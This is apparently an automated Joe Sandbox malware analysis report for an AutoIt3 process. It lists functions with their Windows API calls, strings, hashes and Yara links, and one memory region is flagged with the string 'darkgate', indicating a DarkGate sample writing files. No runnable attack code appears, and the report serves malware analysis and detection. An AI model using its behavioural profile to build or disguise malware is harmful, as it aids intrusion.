                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0083C018
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0083C02F
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0083C04B
                                      • DeleteObject.GDI32(00000000), ref: 0083C05D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: c7ce51714c3dca0deede313a1f54819de00b02655f4b6bf632b9d8115a64fdba
                                      • Instruction ID: 01ebc42e55de16270083029e811b56ba6dddfff756feb186418fe4aed44f4001
                                      • Opcode Fuzzy Hash: c7ce51714c3dca0deede313a1f54819de00b02655f4b6bf632b9d8115a64fdba
                                      • Instruction Fuzzy Hash: C761CC31114A04DFDB79AF18DD5CB2AB7F1FF80316F148529E142E6AA0C7B1A890DF99
                                      Function 00802581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029AB: GetWindowLongW.USER32(?,000000EB), ref: 008029BC
                                      • GetSysColor.USER32(0000000F), ref: 008025AF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: eaf4d35a8c52d9f1ed5a8331e273cda457da0d3eb699b6b69d8f05d9b0ab0f81
                                      • Instruction ID: 6a8d9267a0388e4d39a1328ddd221e04aa9a3570a6cac56744d702466047bae4
                                      • Opcode Fuzzy Hash: eaf4d35a8c52d9f1ed5a8331e273cda457da0d3eb699b6b69d8f05d9b0ab0f81
                                      • Instruction Fuzzy Hash: 6B418B31104104AFDB616F289C8CBBA3B65FB5A335F194262FAB6CA1E1D7718C41DF61
                                      Function 008129BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00820B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00812A3E,?,00008000), ref: 00820BA7
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00812ADF
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00812C2C
                                        • Part of subcall function 00813EBE: _wcscpy.LIBCMT ref: 00813EF6
                                        • Part of subcall function 0082386D: _iswctype.LIBCMT ref: 00823875
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 537147316-3738523708
                                      • Opcode ID: aca5a804877bed7e84c03ea937816ac251378450ff1d80ced621e5382e1315c6
                                      • Instruction ID: ce6ff6c1b6816f5e2d46b3cec64b4b1973e060ad7e5c00438f4ec0fc3dad3be1
                                      • Opcode Fuzzy Hash: aca5a804877bed7e84c03ea937816ac251378450ff1d80ced621e5382e1315c6
                                      • Instruction Fuzzy Hash: 910236701083459FC724EF28C851AAEBBE9FF95354F10492DF599D72A2DB309A89CB43
                                      Function 0086AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,00890980), ref: 0086AF4E
                                      • GetDriveTypeW.KERNEL32(00000061,008BB5F0,00000061), ref: 0086B018
                                      • _wcscpy.LIBCMT ref: 0086B042
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: 72387c833a9740feb8a0cbd7eb30eb27a9fbfc6b354792a9f46f8be015556ec7
                                      • Instruction ID: f33cec433d6285ea07fcce72b799102d6d12c44be3b862eb03b416983111f6f7
                                      • Opcode Fuzzy Hash: 72387c833a9740feb8a0cbd7eb30eb27a9fbfc6b354792a9f46f8be015556ec7
                                      • Instruction Fuzzy Hash: 2A51CB701083059FC714EF18DC92AAABBA9FF90304F104819F695D72A2EF71ED49CA53
                                      Function 00804D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __i64tow__itow__swprintf
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 421087845-2263619337
                                      • Opcode ID: 0a86dbf1fb9f3db911867a8291ae8e9e9ebc14eafa223d3cd4ea2b2c427f71c4
                                      • Instruction ID: 55988599cbe6784503212627988ac04781b647c50d6f1084ae1b363181d5bf7b
                                      • Opcode Fuzzy Hash: 0a86dbf1fb9f3db911867a8291ae8e9e9ebc14eafa223d3cd4ea2b2c427f71c4
                                      • Instruction Fuzzy Hash: C741F371644219AFDB24DF28ED42E7A73E8FF44304F20446EE649D72D2EA3199818B51
                                      Function 00887777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0088778F
                                      • CreateMenu.USER32 ref: 008877AA
                                      • SetMenu.USER32(?,00000000), ref: 008877B9
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887846
                                      • IsMenu.USER32(?), ref: 0088785C
                                      • CreatePopupMenu.USER32 ref: 00887866
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00887893
                                      • DrawMenuBar.USER32 ref: 0088789B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                      • String ID: 0$F
                                      • API String ID: 176399719-3044882817
                                      • Opcode ID: 65a46a304fd2edbf05db0baa43cdbc1890a1a60282b910968492ec411e7bfe89
                                      • Instruction ID: edbed7da4423f0cea0c410b989db33dbdf493f26ccde46f9b021974ae8205f6d
                                      • Opcode Fuzzy Hash: 65a46a304fd2edbf05db0baa43cdbc1890a1a60282b910968492ec411e7bfe89
                                      • Instruction Fuzzy Hash: EE414574A00209EFDB10EF64D988A9ABBB5FF48310F280029ED45E7360C731A910CF54
                                      Function 00887AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00887B83
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00887B8A
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00887B9D
                                      • SelectObject.GDI32(00000000,00000000), ref: 00887BA5
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00887BB0
                                      • DeleteDC.GDI32(00000000), ref: 00887BB9
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00887BC3
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00887BD7
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00887BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: bd5fafe96067189fd2141bb79c4f9a88963eebc80b690d472ff79c4e2e53c4e2
                                      • Instruction ID: 735e1e9cb1445e1c969f5af7780d24b79e26b56bbc0af7b47d820151a6a2e23f
                                      • Opcode Fuzzy Hash: bd5fafe96067189fd2141bb79c4f9a88963eebc80b690d472ff79c4e2e53c4e2
                                      • Instruction Fuzzy Hash: 25314932104219AFDF12AFA4DC49FDB3B7AFF09320F250215FA55A61A0C731D821DBA4
                                      Function 00827030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0082706B
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      • __gmtime64_s.LIBCMT ref: 00827104
                                      • __gmtime64_s.LIBCMT ref: 0082713A
                                      • __gmtime64_s.LIBCMT ref: 00827157
                                      • __allrem.LIBCMT ref: 008271AD
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008271C9
                                      • __allrem.LIBCMT ref: 008271E0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008271FE
                                      • __allrem.LIBCMT ref: 00827215
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00827233
                                      • __invoke_watson.LIBCMT ref: 008272A4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                      • Instruction ID: e2bb702b82078b5b78706857fb9cd61f9e5697bb0c369cc6a6c961b0c02becb8
                                      • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                      • Instruction Fuzzy Hash: 7371F771A04B27EBE7149E7EEC42B5AB3A9FF50324F14422AF514E7281E770DA8487D1
                                      Function 00862CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00862CE9
                                      • GetMenuItemInfoW.USER32(008C7890,000000FF,00000000,00000030), ref: 00862D4A
                                      • SetMenuItemInfoW.USER32(008C7890,00000004,00000000,00000030), ref: 00862D80
                                      • Sleep.KERNEL32(000001F4), ref: 00862D92
                                      • GetMenuItemCount.USER32(?), ref: 00862DD6
                                      • GetMenuItemID.USER32(?,00000000), ref: 00862DF2
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00862E1C
                                      • GetMenuItemID.USER32(?,?), ref: 00862E61
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00862EA7
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862EBB
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862EDC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: f0b6ce60e20d32228ceb97845f736dbfa2af02c9b7a839bd6b3b3114f3877df7
                                      • Instruction ID: e2a06cad7ebe425ee9a29e9ae851d5753615c4a3e5e0d87db17d7b7d5bc02743
                                      • Opcode Fuzzy Hash: f0b6ce60e20d32228ceb97845f736dbfa2af02c9b7a839bd6b3b3114f3877df7
                                      • Instruction Fuzzy Hash: E6619E71900649AFDB11DF64DC88EAE7BB8FB41304F1640AAF841E7252D732AD05CB21
                                      Function 00887548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008875CA
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008875CD
                                      • GetWindowLongW.USER32(?,000000F0), ref: 008875F1
                                      • _memset.LIBCMT ref: 00887602
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00887614
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0088768C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_memset
                                      • String ID:
                                      • API String ID: 830647256-0
                                      • Opcode ID: c4b820052ef1ecbee261256ae55c5a361b1759ab4ef78bb070eb0c3303ac25e8
                                      • Instruction ID: b98894172b0c12f882cc292d27b6a822c09626c8cf99fb2897a5bbdce6bb02ca
                                      • Opcode Fuzzy Hash: c4b820052ef1ecbee261256ae55c5a361b1759ab4ef78bb070eb0c3303ac25e8
                                      • Instruction Fuzzy Hash: C1616775900208AFDB10EFA8CC85EAE77F8FB49714F2401A9FA15E72A1D770AD41DB60
                                      Function 008577B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008577DD
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00857836
                                      • VariantInit.OLEAUT32(?), ref: 00857848
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00857868
                                      • VariantCopy.OLEAUT32(?,?), ref: 008578BB
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 008578CF
                                      • VariantClear.OLEAUT32(?), ref: 008578E4
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 008578F1
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008578FA
                                      • VariantClear.OLEAUT32(?), ref: 0085790C
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00857917
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 6b5b07850cbf4ec3d18cb638009d6f2d61d640ad654394df835961685384fc15
                                      • Instruction ID: f7d03c0e3b18d7ef685e2a2be39679ac59d66b8aa8f694020fb772eab98aaa01
                                      • Opcode Fuzzy Hash: 6b5b07850cbf4ec3d18cb638009d6f2d61d640ad654394df835961685384fc15
                                      • Instruction Fuzzy Hash: 45417F75A002199FCB00EFA8DC489ADBBB8FF48345F04C069E955E7261C730AA49CFA5
                                      Function 00878AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • CoInitialize.OLE32 ref: 00878AED
                                      • CoUninitialize.OLE32 ref: 00878AF8
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00893BBC,?), ref: 00878B58
                                      • IIDFromString.OLE32(?,?), ref: 00878BCB
                                      • VariantInit.OLEAUT32(?), ref: 00878C65
                                      • VariantClear.OLEAUT32(?), ref: 00878CC6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 257cc130fe596070b2a89aaf4e379af479b2d92ab93ca3064934710a3bf6348f
                                      • Instruction ID: fde017905bf12416850d9e782edf62a80ad515f1706609a9f777db475405edd1
                                      • Opcode Fuzzy Hash: 257cc130fe596070b2a89aaf4e379af479b2d92ab93ca3064934710a3bf6348f
                                      • Instruction Fuzzy Hash: 7A619FB0244711DFD711DF14C889A5ABBE8FF85718F048859F989DB291CB70ED48CBA2
                                      Function 00875E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00875E7E
                                      • inet_addr.WSOCK32(?,?,?), ref: 00875EC3
                                      • gethostbyname.WSOCK32(?), ref: 00875ECF
                                      • IcmpCreateFile.IPHLPAPI ref: 00875EDD
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875F4D
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00875F63
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00875FD8
                                      • WSACleanup.WSOCK32 ref: 00875FDE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: b06fb5908d3a52d9076c11e8532667af281138918a6722c04a8032a84a6dfb51
                                      • Instruction ID: 2777a3cbca2d75d4e201e553575e7e2ed9aa50dbd9a1265b235bf03d4a4f2b09
                                      • Opcode Fuzzy Hash: b06fb5908d3a52d9076c11e8532667af281138918a6722c04a8032a84a6dfb51
                                      • Instruction Fuzzy Hash: D6518E316046019FD720EF24DC49B2AB7E4FF48724F14896AF999DB2A1DBB0E940DF42
                                      Function 03CFA2FC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000080,00000000,00000000,03CFA4C6,?,?,00000000,00000000), ref: 03CFA360
                                      • ReadFile.KERNEL32(000000FF,03CF9C52,00000000,?,00000000,00000000), ref: 03CFA3AF
                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA3EE
                                      • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA409
                                      • WriteFile.KERNEL32(000000FF,?,?,?,00000000,000000FF,?,00000000,00000000,000000FF,00000000,00000000,00000001,00000000,00000000), ref: 03CFA41F
                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,000000FF,03CF9C52,00000000,?,00000000,00000000), ref: 03CFA441
                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000,000000FF,00000000,00000000,00000002,000000FF,03CF9C52,00000000,?,00000000,00000000), ref: 03CFA45D
                                      • CloseHandle.KERNEL32(000000FF,03CFA49D,?,00000000,00000000), ref: 03CFA490
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Pointer$Write$CloseCreateHandleRead
                                      • String ID: darkgate
                                      • API String ID: 3484830659-757439335
                                      • Opcode ID: 0a089a3bb7ab9544af7f9ece0abf900c23c4d17b7951efca27811dd22a06a69d
                                      • Instruction ID: 947599e53205d8fd2757fdf510ab9e1006175ef162e872a0b4ac66b0b52d3128
                                      • Opcode Fuzzy Hash: 0a089a3bb7ab9544af7f9ece0abf900c23c4d17b7951efca27811dd22a06a69d
                                      • Instruction Fuzzy Hash: 19516279A10308AFDB51EBA8CC55FDEBBB8EB4C700F558425F608FB280D675A9009B65
                                      Function 0086BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086BB13
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0086BB89
                                      • GetLastError.KERNEL32 ref: 0086BB93
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0086BC00
                                      Strings
                                      Memory Dump Source
